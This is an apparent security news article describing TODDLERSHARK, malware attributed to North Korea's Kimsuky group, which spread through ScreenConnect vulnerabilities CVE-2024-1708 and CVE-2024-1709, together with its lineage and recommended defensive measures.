TODDLESHARK Malware
Cybersecurity experts have identified a new malware named TODDLERSHARK, deployed by North Korean threat actors who took advantage of recently revealed security vulnerabilities in ConnectWise ScreenConnect. A report indicates that TODDLERSHARK shares similarities with previously known Kimsuky malware, including BabyShark and ReconShark.
The fraud-related actors accessed the victim's workstation by exploiting vulnerabilities in the ScreenConnect application's setup wizard. With this 'hands-on keyboard' access, they employed cmd.exe to execute mshta.exe, incorporating a URL linked to the Visual Basic (VB) based malware.
The vulnerabilities at the center of the ConnectWise security concerns are CVE-2024-1708 and CVE-2024-1709. Since these vulnerabilities were exposed, multiple threat actors have extensively exploited them. These malevolent actors have utilized the vulnerabilities to distribute a range of unsafe payloads, including cryptocurrency miners, ransomware, Remote Access Trojans RATS), and stealer malware.
Table of Contents
The Kimsuky Cybercriminals are Among the Most Active
The Kimsuky Advanced Persistent Threat (APT) group, recognized by various aliases such as APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (formerly Thallium), KTA082, Nickel Kimball, and Velvet Chollima, has consistently expanded its repertoire of malware tools. Among the latest additions are GoBear and Troll Stealer.
First identified in late 2018, BabyShark was initiated through an HTML Application (HTA) file. Upon execution, this VB script malware extracts system information and sends it to a Command-and-Control (C2) server. Additionally, BabyShark establishes persistence on the system, awaiting further instructions from the operator.
In May 2023, a variant of BabyShark, named ReconShark, was detected. It was delivered through spear-phishing emails, specifically targeting individuals, showcasing the APT group's ongoing evolution and adaptability in their cyber operations.
The TODDLESHARK Malware is Believed to be an Evolution of Previous Kimsuki Threats
TODDLERSHARK is considered the latest iteration of the same malware, evident from both code and behavioral resemblances. Apart from utilizing a scheduled task for maintaining persistence, the malware is designed to effectively capture and transmit sensitive information from compromised hosts, functioning as a valuable reconnaissance tool.
TODDLERSHARK demonstrates characteristics of polymorphic behavior, manifested through alterations in identity strings within its code, shifting the position of code through generated junk code, and employing uniquely generated Command and Control (C2) URLs. These features contribute to the potential challenge of detecting this malware in certain environments.
Measures Recommended by Cybersecurity Researchers against the TODDLESHARK Malware
To enhance the security of systems running ConnectWise ScreenConnect versions 23.9.7 and earlier, immediate action is essential. Following the guidelines outlined in the ConnectWise advisory is crucial to address potential compromises. It is imperative to prioritize the protection and monitoring of systems, particularly those accessible on the Internet. This can be achieved by deploying an endpoint detection and response (EDR) or anti-malware tool specifically configured to conduct thorough system scans for webshells.
Additionally, the implementation or configuration of a Web Application Firewall (WAF) or a comparable web traffic monitoring system is recommended. This measure facilitates real-time analysis, offering enhanced detection capabilities in the event of potential exploitation, contributing to a more robust and resilient security infrastructure.
